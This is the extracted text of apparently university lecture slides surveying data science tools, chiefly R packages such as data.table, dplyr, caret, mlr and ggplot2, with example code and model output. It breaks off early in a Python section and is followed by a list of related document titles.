Data Science Tools Overview

Advanced Analytics in Business [D0S07a] Big Data Platforms & Technologies [D0S06a] Data Science Tools Overview In-memory analytics Python and R More on visualization The road to big data Notebooks and development environments A word on file formats A word on packaging and versioning systems 2 In-memory analytics 3 The landscape is incredibly complex 4 Heard about Hadoop? Spark? H2O? Many vendors with their "big data and analytics" stack Amazon There's always "roll your own" Cloudera Open source, or walled garden? Datameer Support? DataStax What's up to date? Dell Which features? Oracle IBM MapR Pentaho Databricks Microsoft Hortonworks EMC2 5 Two sides emerge Infrastructure "Big Data" "Integration" "Architecture" "Streaming" 6 Two sides emerge Analytics "Data Science" "Machine Learning" "AI" 7 There's a difference 8 In-memory analytics Your data set fits in memory The assumption of many tools SAS, SPSS, MatLAB R, Python, Julia Is this really a problem? Servers with 512GB of RAM have become relatively cheap Cheaper than a HDFS cluster Implementation makes a difference (representation of data set in memory) If your task is unsupervised or supervised modeling, you can apply sampling Some algorithms can work in online / batch mode 9 Python and R 10 The big two The "big two" in modern data science: Python and R Both have their advantages Others are interesting too (e.g. Julia), but less adopted Not (really) due to the language itself Thanks to their huge ecosystem: many packages for data science available Vendors such as SAS and SPSS remain as well But bleeding-edge algorithms or techniques found in open-source first 11 Analytics with R Native concept of a "data frame": a table in which each column contains measurements on one variable, and each row contains one case Unlike an array, the data you store in the columns of a data frame can be of various types I.e., one column might be a numeric variable, another might be a factor, and a third might be a character variable. All columns have to be the same length (contain the same number of data items, although some of those data items may be missing values) 12 Analytics with R Standard data frames are not very efficient data.table : fast aggregation of large data (e.g. 100GB in RAM), fast ordered joins, fast add/modify/delete of columns by group using no copies at all, list columns, a fast friendly file reader DT[i, j, by] # Subset rows using `i`, then calculate `j`, grouped by `` ## R: i j by ## SQL: where select | update group by # How can we get the average arrival and departure delay # for each (orig,dest) pair and each month # for carrier code “AA”? ans <- flights[carrier == "AA", .(m_arr = mean(arr_delay), mean(m_dep = dep_delay)), by = .(origin, dest, month)] # origin dest month m_arr m_dep # 1: JFK LAX 1 6.590361 14.2289157 # 2: LGA PBI 1 -7.758621 0.3103448 # ... # 200: JFK DCA 10 16.483871 15.5161290 13 Analytics with R R is great thanks to its ecosystem Hadley Wickham: Chief Scientist at RStudio, and an Adjunct Professor of Statistics at the University of Auckland, Stanford University, and Rice University Data Science “tidyverse” ggplot2 for visualising data dplyr for manipulating data tidyr for tidying data stringr for working with strings lubridate for working with date/times https://www.tidyverse.org/ Data Import readr for reading .csv and fwf files readxl for reading .xls and .xlsx files haven for SAS, SPSS, and Stata files (also: “foreign” package) httr for talking to web APIs rvest for scraping websites xml2 for importing XML files Concept of "tidy" data and operations 14 Analytics with R head(arrange(select(flights, year, month, day), desc(year))) Can also be written as flights %>% select(year, month, day) %>% arrange(desc(year)) %>% head Similar to Unix pipe operator Great way to fluently express data wrangling operations Note: dplyr can even connect to relational databases and will convert data operations to SQL One way to solve the big data issue! 15 Analytics with R delay <- flights %>% group_by(tailnum) %>% summarise(count = n(), dist = mean(distance, na.rm = TRUE), delay = mean(arr_delay, na.rm = TRUE)) delay %>% filter(count > 20, dist < 2000) %>% ggplot(aes(dist, delay)) + geom_point(aes(size = count), alpha = 1/2) + geom_smooth() + scale_size_area() Also see: https://www.rstudio.com/resources/cheatsheets/ 16 Analytics with R Modeling in R Virtually any unsupervised or supervised algorithm is implemented in R as a package The caret package (short for Classification And REgression Training) is a set of functions that attempt to streamline the process for creating predictive models. The package contains tools for: data splitting pre-processing feature selection model tuning using resampling variable importance estimation (Caret depends on other packages to do the actual modeling, and wraps these to offer a unified interface) You can just use the original package as well if you know what you want 17 Analytics with R require(caret) require(ggplot2) require(randomForest) training <- read.csv("train.csv", na.strings=c("NA","")) test <- read.csv("test.csv", na.strings=c("NA","")) # Invoke caret with random forest and 5-fold cross validation rf_model <- train(TARGET~., data=training, method="rf", trControl=trainControl(method="cv",number=5), ntree=500) # Other parameters can be passed here print(rf_model) ## Random Forest ## ## 5889 samples ## 53 predictors ## 5 classes: 'A', 'B', 'C', 'D', 'E' ## ## No pre-processing ## Resampling: Cross-Validated (5 fold) ## ## Summary of sample sizes: 4711, 4712, 4710, 4711, 4712 ## ## Resampling results across tuning parameters: ## ## mtry Accuracy Kappa Accuracy SD Kappa SD ## 2 1 1 0.006 0.008 ## 27 1 1 0.005 0.006 ## 53 1 1 0.006 0.007 ## ## Accuracy was used to select the optimal model using the largest value. ## The final value used for the model was mtry = 27. 18 Analytics with R print(rf_model$finalModel) ## ## Call: ## randomForest(x = x, y = y, mtry = param$mtry, proximity = TRUE, ## allowParallel = TRUE) ## Type of random forest: classification ## Number of trees: 500 ## No. of variables tried at each split: 27 ## ## OOB estimate of error rate: 0.88% ## Confusion matrix: ## A B C D E class.error ## A 1674 0 0 0 0 0.00000 ## B 11 1119 9 1 0 0.01842 ## C 0 11 1015 1 0 0.01168 ## D 0 2 10 952 1 0.01347 ## E 0 1 0 5 1077 0.00554 19 Analytics with R The mlr package is an alternative to caret R does not define a standardized interface for all its machine learning algorithms Therefore, for any non-trivial experiments, you need to write lengthy, tedious and error-prone wrappers to call the different algorithms and unify their respective output Additionally you need to implement infrastructure to resample your models, optimize hyperparameters, select features, cope with pre- and post-processing of data and compare models in a statistically meaningful way The “mlr” package provides this infrastructure so that you can focus on your experiments The framework provides supervised methods like classification, regression and survival analysis along with their corresponding evaluation and optimization methods, as well as unsupervised methods like clustering It is written in a way that you can extend it yourself or deviate from the implemented convenience methods and construct your own complex experiments or algorithms The package is nicely connected to the OpenML R package and its online platform, which aims at supporting collaborative machine learning online and allows to easily share datasets as well as machine learning tasks, algorithms and experiments in order to support reproducible research Newer, though gaining uptake 20 Analytics with R The modelr package provides functions that help you create elegant pipelines when modelling More recent By Hadley Wickham Mainly for simple regression models only for now More information: http://r4ds.had.co.nz/ Modern R approach Starts simple – linear and visual models Great introduction! 21 Visualizations with R ggplot2 reigns supreme By Hadley Wickham Uses a “grammar of graphics” approach A grammar of graphics is a tool that enables us to concisely describe the components of a graphic An abstraction which makes thinking, reasoning and communicating graphics easier Such a grammar allows us to move beyond named graphics (e.g., the “scatterplot”) and gain insight into the deep structure that underlies statistical graphics Original idea: Wilkinson (2006) ggvis : based on ggplot2 and built on top of vega (a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs) Also declaratively describes data graphics Different render targets Interactivity: interact in browser, phone, … http://ggvis.rstudio.com/ 22 Visualizations with R shiny : a web application framework for R Construct interactive dashboards 23 Other packages worth noting Apart from those mentioned elsewhere... janitor : tools for cleaning data foreign : read in SAS data stringr : work with text lubridate : work with times and dates ROCR : make ROC and other curves (or verification , or pROC , or mltools ) MICE : handle missing data (or naniar ) ROSE : up/down sampling with SMOTE forecast : time series analysis (or prophet ) leaflet : make maps igraph : social network analysis esquisse : drag and drop ggplot2 plot builder (Tableau-style) assertr : assertions on data 24 Analytics with Python Python itself is not a statistical / scientific language SciPy is a Python-based ecosystem of open-source software for mathematics, science, and engineering NumPy is the fundamental package for

Data Science Tools Overview

Quick Install for AWS EMR

Introduction to Ggplot2

Delft University of Technology Arrowsam In-Memory Genomics

Regression Models by Gretl and R Statistical Packages for Data Analysis in Marine Geology Polina Lemenkova

The Platform Inside and out Release 0.8

Julia: a Fresh Approach to Numerical Computing∗

Revolution R Enterprise™ 7.1 Getting Started Guide

Julia: a Modern Language for Modern ML

Download from a Repository for Fur- Should Be Conducted When Deemed Appropriate by Pub- Ther Development Or Customisation

Gramm: Grammar of Graphics Plotting in Matlab

Figure Properties in Matlab

Arrow: Integration to 'Apache' 'Arrow'